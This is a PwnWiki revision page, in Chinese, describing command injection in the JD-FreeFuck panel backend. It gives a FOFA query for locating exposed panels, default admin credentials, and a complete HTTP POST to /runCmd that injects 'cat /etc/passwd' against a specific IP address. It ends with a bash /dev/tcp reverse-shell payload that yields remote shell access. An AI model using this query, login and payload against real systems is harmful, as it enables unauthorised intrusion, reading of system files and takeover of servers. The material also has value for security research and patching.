Difference between revisions of "JD-FreeFuck 後台命令執行漏洞"
From PwnWiki
(Marked this version for translation) |
|||
| Line 7: | Line 7: | ||
<translate> | <translate> | ||
| − | ==默認帳號密碼== | + | ==默認帳號密碼== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 14: | Line 14: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
發送如下請求包執行命令: | 發送如下請求包執行命令: | ||
</translate> | </translate> | ||
| Line 40: | Line 41: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
其中 cmd 參數存在命令注入。 | 其中 cmd 參數存在命令注入。 | ||
</translate> | </translate> | ||
| Line 49: | Line 51: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:5--> |
</translate> | </translate> | ||
Revision as of 22:35, 29 March 2021
FOFA
title="京东薅羊毛控制面板"
默認帳號密碼
useradmin/supermanito
漏洞利用
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: 101.200.189.251:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
Getshell
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
